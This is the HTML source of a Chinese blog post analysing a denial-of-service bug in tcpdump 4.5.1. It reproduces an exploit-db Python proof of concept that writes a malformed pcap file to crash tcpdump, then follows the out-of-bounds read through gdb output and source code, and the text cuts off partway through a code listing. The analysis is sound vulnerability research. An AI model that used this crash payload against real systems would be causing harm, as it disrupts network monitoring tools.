Cool-Y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html
2019-07-10 12:27:33 +08:00

1418 lines
77 KiB
HTML
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

<!DOCTYPE html>
<html class="theme-next gemini use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">
<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
<link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">
<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">
<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">
<link rel="apple-touch-icon" sizes="180x180" href="/images/hackerrank.png?v=5.1.4">
<link rel="icon" type="image/png" sizes="32x32" href="/images/hackerrank.png?v=5.1.4">
<link rel="icon" type="image/png" sizes="16x16" href="/images/hackerrank.png?v=5.1.4">
<link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">
<meta name="keywords" content="TCPDUMP,拒绝服务攻击,">
<meta name="description" content="TCPDUMP 4.5.1 拒绝服务攻击漏洞分析Tcpdump介绍 tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中tcpdump 需要使用libpcap这个捕捉数据的">
<meta name="keywords" content="TCPDUMP,拒绝服务攻击">
<meta property="og:type" content="article">
<meta property="og:title" content="TCPDUMP拒绝服务攻击漏洞">
<meta property="og:url" content="https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html">
<meta property="og:site_name" content="混元霹雳手">
<meta property="og:description" content="TCPDUMP 4.5.1 拒绝服务攻击漏洞分析Tcpdump介绍 tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中tcpdump 需要使用libpcap这个捕捉数据的">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-07-01T09:28:40.813Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="TCPDUMP拒绝服务攻击漏洞">
<meta name="twitter:description" content="TCPDUMP 4.5.1 拒绝服务攻击漏洞分析Tcpdump介绍 tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中tcpdump 需要使用libpcap这个捕捉数据的">
<script type="text/javascript" id="hexo.configurations">
var NexT = window.NexT || {};
var CONFIG = {
root: '/',
scheme: 'Gemini',
version: '5.1.4',
sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
fancybox: true,
tabs: true,
motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
duoshuo: {
userId: '0',
author: '博主'
},
algolia: {
applicationID: '',
apiKey: '',
indexName: '',
hits: {"per_page":10},
labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
}
};
</script>
<link rel="canonical" href="https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/">
<title>TCPDUMP拒绝服务攻击漏洞 | 混元霹雳手</title>
</head>
<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">
<div class="container sidebar-position-left page-post-detail">
<div class="headband"></div>
<header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
<div class="header-inner"><div class="site-brand-wrapper">
<div class="site-meta ">
<div class="custom-logo-site-title">
<a href="/" class="brand" rel="start">
<span class="logo-line-before"><i></i></span>
<span class="site-title">混元霹雳手</span>
<span class="logo-line-after"><i></i></span>
</a>
</div>
<p class="site-subtitle">多得是,你不知道的事</p>
</div>
<div class="site-nav-toggle">
<button>
<span class="btn-bar"></span>
<span class="btn-bar"></span>
<span class="btn-bar"></span>
</button>
</div>
</div>
<nav class="site-nav">
<ul id="menu" class="menu">
<li class="menu-item menu-item-home">
<a href="/" rel="section">
<i class="menu-item-icon fa fa-fw fa-home"></i> <br>
首页
</a>
</li>
<li class="menu-item menu-item-about">
<a href="/about/" rel="section">
<i class="menu-item-icon fa fa-fw fa-user"></i> <br>
关于
</a>
</li>
<li class="menu-item menu-item-tags">
<a href="/tags/" rel="section">
<i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
标签
</a>
</li>
<li class="menu-item menu-item-categories">
<a href="/categories/" rel="section">
<i class="menu-item-icon fa fa-fw fa-th"></i> <br>
分类
</a>
</li>
<li class="menu-item menu-item-archives">
<a href="/archives/" rel="section">
<i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
归档
</a>
</li>
<li class="menu-item menu-item-bookmarks">
<a href="/bookmarks/" rel="section">
<i class="menu-item-icon fa fa-fw fa-map"></i> <br>
书签
</a>
</li>
<li class="menu-item menu-item-search">
<a href="javascript:;" class="popup-trigger">
<i class="menu-item-icon fa fa-search fa-fw"></i> <br>
搜索
</a>
</li>
</ul>
<div class="site-search">
<div class="popup search-popup local-search-popup">
<div class="local-search-header clearfix">
<span class="search-icon">
<i class="fa fa-search"></i>
</span>
<span class="popup-btn-close">
<i class="fa fa-times-circle"></i>
</span>
<div class="local-search-input-wrapper">
<input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
</div>
</div>
<div id="local-search-result"></div>
</div>
</div>
</nav>
</div>
</header>
<main id="main" class="main">
<div class="main-inner">
<div class="content-wrap">
<div id="content" class="content">
<div id="posts" class="posts-expand">
<article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
<div class="post-block">
<link itemprop="mainEntityOfPage" href="https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="name" content="Cool-Y">
<meta itemprop="description" content>
<meta itemprop="image" content="/images/avatar.png">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="混元霹雳手">
</span>
<header class="post-header">
<h1 class="post-title" itemprop="name headline">TCPDUMP拒绝服务攻击漏洞</h1>
<div class="post-meta">
<span class="post-time">
<span class="post-meta-item-icon">
<i class="fa fa-calendar-o"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建于" itemprop="dateCreated datePublished" datetime="2018-12-25T12:26:05+08:00">
2018-12-25
</time>
</span>
<span class="post-category">
<span class="post-meta-divider">|</span>
<span class="post-meta-item-icon">
<i class="fa fa-folder-o"></i>
</span>
<span class="post-meta-item-text">分类于</span>
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
<a href="/categories/二进制/" itemprop="url" rel="index">
<span itemprop="name">二进制</span>
</a>
</span>
</span>
<span id="/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" class="leancloud_visitors" data-flag-title="TCPDUMP拒绝服务攻击漏洞">
<span class="post-meta-divider">|</span>
<span class="post-meta-item-icon">
<i class="fa fa-eye"></i>
</span>
<span class="post-meta-item-text">阅读次数&#58;</span>
<span class="leancloud-visitors-count"></span>
</span>
<div class="post-wordcount">
<span class="post-meta-item-icon">
<i class="fa fa-file-word-o"></i>
</span>
<span title="字数统计">
3.4k 字
</span>
<span class="post-meta-divider">|</span>
<span class="post-meta-item-icon">
<i class="fa fa-clock-o"></i>
</span>
<span title="阅读时长">
16 分钟
</span>
</div>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<h1 id="TCPDUMP-4-5-1-拒绝服务攻击漏洞分析"><a href="#TCPDUMP-4-5-1-拒绝服务攻击漏洞分析" class="headerlink" title="TCPDUMP 4.5.1 拒绝服务攻击漏洞分析"></a>TCPDUMP 4.5.1 拒绝服务攻击漏洞分析</h1><h2 id="Tcpdump介绍"><a href="#Tcpdump介绍" class="headerlink" title="Tcpdump介绍"></a>Tcpdump介绍</h2><ol>
<li>tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中tcpdump 需要使用libpcap这个捕捉数据的库。其在Windows下的版本称为WinDump它需要WinPcap驱动相当于在Linux平台下的libpcap.</li>
<li>tcpdump能够分析网络行为性能和应用产生或接收网络流量。它支持针对网络层、协议、主机、网络或端口的过滤并提供and、or、not等逻辑语句来帮助你去掉无用的信息从而使用户能够进一步找出问题的根源。</li>
<li>也可以使用 tcpdump 的实现特定目的,例如在路由器和网关之间拦截并显示其他用户或计算机通信。通过 tcpdump 分析非加密的流量如Telnet或HTTP的数据包查看登录的用户名、密码、网址、正在浏览的网站内容或任何其他信息。因此系统中存在网络分析工具主要不是对本机安全的威胁而是对网络上的其他计算机的安全存在威胁。</li>
</ol>
<h2 id="分析环境"><a href="#分析环境" class="headerlink" title="分析环境"></a>分析环境</h2><ul>
<li>Ubuntu 16.04.4 LTS i686</li>
<li>tcpdump 4.5.1</li>
<li>gdb with peda</li>
</ul>
<h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h2><p>这个漏洞触发的原因是tcpdump在处理特殊的pcap包的时候由于对数据包传输数据长度没有进行严格的控制导致在连续读取数据包中内容超过一定长度后会读取到无效的内存空间从而导致拒绝服务的发生。对于这个漏洞首先要对pcap包的结构进行一定的分析才能够最后分析出漏洞的成因下面对这个漏洞进行复现。</p>
<h3 id="编译安装tcpdump"><a href="#编译安装tcpdump" class="headerlink" title="编译安装tcpdump"></a>编译安装tcpdump</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">1. # apt-get install libpcap-dev</span><br><span class="line">2. # dpkg -l libpcap-dev</span><br><span class="line">3. # wget https://www.exploit-db.com/apps/973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz</span><br><span class="line">4. # tar -zxvf 973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz</span><br><span class="line">5. # cd tcpdump-4.5.1/</span><br><span class="line">6. # ./configure</span><br><span class="line">7. # make</span><br><span class="line">8. # make install</span><br><span class="line">9. # tcpdump -version</span><br><span class="line"> tcpdump version 4.5.1</span><br><span class="line"> libpcap version 1.7.4</span><br></pre></td></tr></table></figure>
<h3 id="生成payload来自exploit-db-payload"><a href="#生成payload来自exploit-db-payload" class="headerlink" title="生成payload来自exploit-db payload"></a>生成payload来自exploit-db payload</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"># Exploit Title: tcpdump 4.5.1 Access Violation Crash</span><br><span class="line"># Date: 31st May 2016</span><br><span class="line"># Exploit Author: David Silveiro</span><br><span class="line"># Vendor Homepage: http://www.tcpdump.org</span><br><span class="line"># Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz</span><br><span class="line"># Version: 4.5.1</span><br><span class="line"># Tested on: Ubuntu 14 LTS</span><br><span class="line">from subprocess import call</span><br><span class="line">from shlex import split</span><br><span class="line">from time import sleep</span><br><span class="line"></span><br><span class="line">def crash():</span><br><span class="line"> command = &apos;tcpdump -r crash&apos;</span><br><span class="line"> buffer = &apos;\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\xf5\xff&apos;</span><br><span class="line"> buffer += &apos;\x00\x00\x00I\x00\x00\x00\xe6\x00\x00\x00\x00\x80\x00&apos;</span><br><span class="line"> buffer += &apos;\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00&lt;\x9c7@\xff\x00&apos;</span><br><span class="line"> buffer += &apos;\x06\xa0r\x7f\x00\x00\x01\x7f\x00\x00\xec\x00\x01\xe0\x1a&apos;</span><br><span class="line"> buffer += &quot;\x00\x17g+++++++\x85\xc9\x03\x00\x00\x00\x10\xa0&amp;\x80\x18\&apos;&quot;</span><br><span class="line"> buffer += &quot;xfe$\x00\x01\x00\x00@\x0c\x04\x02\x08\n&apos;, &apos;\x00\x00\x00\x00&quot;</span><br><span class="line"> buffer += &apos;\x00\x00\x00\x00\x01\x03\x03\x04&apos;</span><br><span class="line"> with open(&apos;crash&apos;, &apos;w+b&apos;) as file:</span><br><span class="line"> file.write(buffer)</span><br><span class="line"> try:</span><br><span class="line"> call(split(command))</span><br><span class="line"> print(&quot;Exploit successful! &quot;)</span><br><span class="line"> except:</span><br><span class="line"> print(&quot;Error: Something has gone wrong!&quot;)</span><br><span class="line">def main():</span><br><span class="line"> print(&quot;Author: David Silveiro &quot;)</span><br><span class="line"> print(&quot; tcpdump version 4.5.1 Access Violation Crash &quot;)</span><br><span class="line"> sleep(2)</span><br><span class="line"> crash()</span><br><span class="line">if __name__ == &quot;__main__&quot;:</span><br><span class="line"> main()</span><br></pre></td></tr></table></figure>
<h2 id="崩溃分析"><a href="#崩溃分析" class="headerlink" title="崩溃分析"></a>崩溃分析</h2><h3 id="pcap包格式"><a href="#pcap包格式" class="headerlink" title="pcap包格式"></a>pcap包格式</h3><p>首先来分析一下pcap包的格式首先是pcap文件头的内容在.h有所定义这里将结构体以及对应变量含义都列出来。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">struct pcap_file_header &#123;</span><br><span class="line"> bpf_u_int32 magic;</span><br><span class="line"> u_short version_major;</span><br><span class="line"> u_short version_minor;</span><br><span class="line"> bpf_int32 thiszone; /* gmt to local correction */</span><br><span class="line"> bpf_u_int32 sigfigs; /* accuracy of timestamps */</span><br><span class="line"> bpf_u_int32 snaplen; /* max length saved portion of each pkt */</span><br><span class="line"> bpf_u_int32 linktype; /* data link type (LINKTYPE_*) */</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></p>
<p>看一下各字段的含义:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"> magic 4字节 pcap文件标识 目前为“d4 c3 b2 a1”</span><br><span class="line"> major 2字节 主版本号 #define PCAP_VERSION_MAJOR 2</span><br><span class="line"> minor 2字节 次版本号 #define PCAP_VERSION_MINOR 4</span><br><span class="line"> thiszone4字节 时区修正 并未使用目前全为0</span><br><span class="line"> sigfigs 4字节 精确时间戳 并未使用目前全为0</span><br><span class="line"> snaplen 4字节 抓包最大长度 如果要抓全设为0x0000ffff65535</span><br><span class="line"> tcpdump -s 0就是设置这个参数缺省为68字节</span><br><span class="line"> linktype4字节 链路类型 一般都是1ethernet</span><br><span class="line"></span><br><span class="line">struct pcap_pkthdr &#123;</span><br><span class="line"> struct timeval ts; /* time stamp */</span><br><span class="line"> bpf_u_int32 caplen; /* length of portion present */</span><br><span class="line"> bpf_u_int32 len; /* length this packet (off wire) */</span><br><span class="line">&#125;;</span><br><span class="line">struct timeval &#123;</span><br><span class="line"> long tv_sec; /* seconds (XXX should be time_t) */</span><br><span class="line"> suseconds_t tv_usec; /* and microseconds */</span><br><span class="line">&#125;;</span><br><span class="line"> ts 8字节 抓包时间 4字节表示秒数4字节表示微秒数</span><br><span class="line"> caplen4字节 保存下来的包长度最多是snaplen比如68字节</span><br><span class="line"> len 4字节 数据包的真实长度如果文件中保存的不是完整数据包可能比caplen大</span><br></pre></td></tr></table></figure></p>
<p>其中len变量是值得关注的因为在crash文件中对应len变量的值为00 3C 9C 37<br>这是一个很大的值读取出来就是379C3C00数非常大实际上在wireshark中打开这个crash文件就会报错会提示这个数据包的长度已经超过了范围而换算出来的长度就是379C3C00这是触发漏洞的关键。</p>
<h3 id="gdb调试"><a href="#gdb调试" class="headerlink" title="gdb调试"></a>gdb调试</h3><p>首先通过gdb运行tcpdump用-r参数打开poc生成的crashtcp崩溃到达漏洞触发位置<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">1. Program received signal SIGSEGV, Segmentation fault.</span><br><span class="line">2. [----------------------------------registers-----------------------------------]</span><br><span class="line">3. EAX: 0x1</span><br><span class="line">4. EBX: 0x81e33bd --&gt; 0x0</span><br><span class="line">5. ECX: 0x2e (&apos;.&apos;)</span><br><span class="line">6. EDX: 0x0</span><br><span class="line">7. ESI: 0xbfffe201 (&apos;.&apos; &lt;repeats 14 times&gt;)</span><br><span class="line">8. EDI: 0xbfffe1db --&gt; 0x30303000 (&apos;&apos;)</span><br><span class="line">9. EBP: 0x10621</span><br><span class="line">10. ESP: 0xbfffe1ac --&gt; 0x8053caa (&lt;hex_and_ascii_print_with_offset+170&gt;: mov ecx,DWORD PTR [esp+0xc])</span><br><span class="line">11. EIP: 0x8053c6a (&lt;hex_and_ascii_print_with_offset+106&gt;: movzx edx,BYTE PTR [ebx+ebp*2+0x1])</span><br><span class="line">12. EFLAGS: 0x10296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)</span><br><span class="line">13. [-------------------------------------code-------------------------------------]</span><br><span class="line">14. 0x8053c5d &lt;hex_and_ascii_print_with_offset+93&gt;: je 0x8053d40 &lt;hex_and_ascii_print_with_offset+320&gt;</span><br><span class="line">15. 0x8053c63 &lt;hex_and_ascii_print_with_offset+99&gt;: mov ebx,DWORD PTR [esp+0x18]</span><br><span class="line">16. 0x8053c67 &lt;hex_and_ascii_print_with_offset+103&gt;: sub esp,0x4</span><br><span class="line">17. =&gt; 0x8053c6a &lt;hex_and_ascii_print_with_offset+106&gt;: movzx edx,BYTE PTR [ebx+ebp*2+0x1]</span><br><span class="line">18. 0x8053c6f &lt;hex_and_ascii_print_with_offset+111&gt;: movzx ecx,BYTE PTR [ebx+ebp*2]</span><br><span class="line">19. 0x8053c73 &lt;hex_and_ascii_print_with_offset+115&gt;: push edx</span><br><span class="line">20. 0x8053c74 &lt;hex_and_ascii_print_with_offset+116&gt;: mov ebx,edx</span><br><span class="line">21. 0x8053c76 &lt;hex_and_ascii_print_with_offset+118&gt;: mov DWORD PTR [esp+0x18],edx</span><br><span class="line">22. [------------------------------------stack-------------------------------------]</span><br><span class="line">23. 0000| 0xbfffe1ac --&gt; 0x8053caa (&lt;hex_and_ascii_print_with_offset+170&gt;: mov ecx,DWORD PTR [esp+0xc])</span><br><span class="line">24. 0004| 0xbfffe1b0 --&gt; 0xb7fff000 --&gt; 0x23f3c</span><br><span class="line">25. 0008| 0xbfffe1b4 --&gt; 0x1</span><br><span class="line">26. 0012| 0xbfffe1b8 --&gt; 0x2f5967 (&apos;gY/&apos;)</span><br><span class="line">27. 0016| 0xbfffe1bc --&gt; 0x0</span><br><span class="line">28. 0020| 0xbfffe1c0 --&gt; 0x0</span><br><span class="line">29. 0024| 0xbfffe1c4 --&gt; 0x7ffffff9</span><br><span class="line">30. 0028| 0xbfffe1c8 --&gt; 0x81e33bd --&gt; 0x0</span><br><span class="line">31. [------------------------------------------------------------------------------]</span><br><span class="line">32. Legend: code, data, rodata, value</span><br><span class="line">33. Stopped reason: SIGSEGV</span><br><span class="line">34. hex_and_ascii_print_with_offset (ident=0x80c04af &quot;\n\t&quot;, cp=0x8204000 &lt;error: Cannot access memory at address 0x8204000&gt;,</span><br><span class="line">35. length=0xfffffff3, oset=0x20c40) at ./print-ascii.c:91</span><br><span class="line">36. 91 s2 = *cp++;</span><br></pre></td></tr></table></figure></p>
<p>从崩溃信息来看出错位置为s2 = <em>cp++;崩溃原因为SIGSEGV即进程执行了一段无效的内存引用或发生段错误。可以看到问题出现在./print-ascii.c:91而且此时指针读取[ebx+ebp</em>2+0x1]的内容,可能是越界读取造成的崩溃。<br>再结合源码信息可知指针cp在自加的过程中访问到了一个没有权限访问的地址因为这是写在一个while循环里也就是是说nshorts的值偏大再看nshorts怎么来的由此nshorts = length / sizeof(u_short);可知可能是函数传入的参数length没有控制大小导致因此目标就是追踪length是如何传入的。<br>我们通过bt回溯一下调用情况。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">1. gdb-peda$ bt</span><br><span class="line">2. #0 hex_and_ascii_print_with_offset (ident=0x80c04af &quot;\n\t&quot;, cp=0x8204000 &lt;error: Cannot access memory at address 0x8204000&gt;,</span><br><span class="line">3. length=0xfffffff3, oset=0x20c40) at ./print-ascii.c:91</span><br><span class="line">4. #1 0x08053e26 in hex_and_ascii_print (ident=0x80c04af &quot;\n\t&quot;, cp=0x81e33bd &quot;&quot;, length=0xfffffff3) at ./print-ascii.c:127</span><br><span class="line">5. #2 0x08051e7d in ieee802_15_4_if_print (ndo=0x81e1320 &lt;Gndo&gt;, h=0xbfffe40c, p=&lt;optimized out&gt;) at ./print-802_15_4.c:180</span><br><span class="line">6. #3 0x080a0aea in print_packet (user=0xbfffe4dc &quot; \023\036\b\300\034\005\b\001&quot;, h=0xbfffe40c, sp=0x81e33a8 &quot;@\377&quot;)</span><br><span class="line">7. at ./tcpdump.c:1950</span><br><span class="line">8. #4 0xb7fa3468 in ?? () from /usr/lib/i386-linux-gnu/libpcap.so.0.8</span><br><span class="line">9. #5 0xb7f940e3 in pcap_loop () from /usr/lib/i386-linux-gnu/libpcap.so.0.8</span><br><span class="line">10. #6 0x0804b3dd in main (argc=0x3, argv=0xbffff6c4) at ./tcpdump.c:1569</span><br><span class="line">11. #7 0xb7de9637 in __libc_start_main (main=0x804a4c0 &lt;main&gt;, argc=0x3, argv=0xbffff6c4, init=0x80b1230 &lt;__libc_csu_init&gt;,</span><br><span class="line">12. fini=0x80b1290 &lt;__libc_csu_fini&gt;, rtld_fini=0xb7fea880 &lt;_dl_fini&gt;, stack_end=0xbffff6bc) at ../csu/libc-start.c:291</span><br><span class="line">13. #8 0x0804c245 in _start ()</span><br></pre></td></tr></table></figure></p>
<p>函数调用流程<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">pcap_loop</span><br><span class="line"> |----print_packet</span><br><span class="line"> |-----hex_and_ascii_print</span><br><span class="line"> |-------- hex_and_ascii_print_with_offset</span><br></pre></td></tr></table></figure></p>
<p>由此可见从main函数开始了一连串函数调用git源码下来看看。<br>tcpdump.c找到pcap_loop调用<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">1. do &#123;</span><br><span class="line">2. status = pcap_loop(pd, cnt, callback, pcap_userdata);</span><br><span class="line">3. if (WFileName == NULL) &#123;</span><br><span class="line">4. /*</span><br><span class="line">5. * We&apos;re printing packets. Flush the printed output,</span><br><span class="line">6. * so it doesn&apos;t get intermingled with error output.</span><br><span class="line">7. */</span><br><span class="line">8. if (status == -2) &#123;</span><br><span class="line">9. /*</span><br><span class="line">10. * We got interrupted, so perhaps we didn&apos;t</span><br><span class="line">11. * manage to finish a line we were printing.</span><br><span class="line">12. * Print an extra newline, just in case.</span><br><span class="line">13. */</span><br><span class="line">14. putchar(&apos;n&apos;);</span><br><span class="line">15. &#125;</span><br><span class="line">16. (void)fflush(stdout);</span><br><span class="line">17. &#125;</span><br></pre></td></tr></table></figure></p>
<p>设置断点之后查看一下该函数的执行结果</p>
<p>pcap_loop通过callback指向print_packet,来看一下它的源码<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">1. static void</span><br><span class="line">2. print_packet(u_char *user, const struct pcap_pkthdr *h, const u_char *sp)</span><br><span class="line">3. &#123;</span><br><span class="line">4. struct print_info *print_info;</span><br><span class="line">5. u_int hdrlen;</span><br><span class="line">6. ++packets_captured;</span><br><span class="line">7. ++infodelay;</span><br><span class="line">8. ts_print(&amp;h-&gt;ts);</span><br><span class="line">9. print_info = (struct print_info *)user;</span><br><span class="line">10. /*</span><br><span class="line">11. * Some printers want to check that they&apos;re not walking off the</span><br><span class="line">12. * end of the packet.</span><br><span class="line">13. * Rather than pass it all the way down, we set this global.</span><br><span class="line">14. */</span><br><span class="line">15. snapend = sp + h-&gt;caplen;</span><br><span class="line">16. if(print_info-&gt;ndo_type) &#123;</span><br><span class="line">17. hdrlen = (*print_info-&gt;p.ndo_printer)(print_info-&gt;ndo, h, sp);&lt;====</span><br><span class="line">18. &#125; else &#123;</span><br><span class="line">19. hdrlen = (*print_info-&gt;p.printer)(h, sp);</span><br><span class="line">20. &#125;</span><br><span class="line">21. putchar(&apos;n&apos;);</span><br><span class="line">22. --infodelay;</span><br><span class="line">23. if (infoprint)</span><br><span class="line">24. info(0);&#125;</span><br></pre></td></tr></table></figure></p>
<p>同样设置断点看该函数是如何调用执行的</p>
<p>这是我们可以根据call的信息计算出调用的函数名</p>
<p>其中(*print_info-&gt;p.ndo_printer)(print_info-&gt;ndo,h,sp)指向ieee802_15_4_if_print</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span 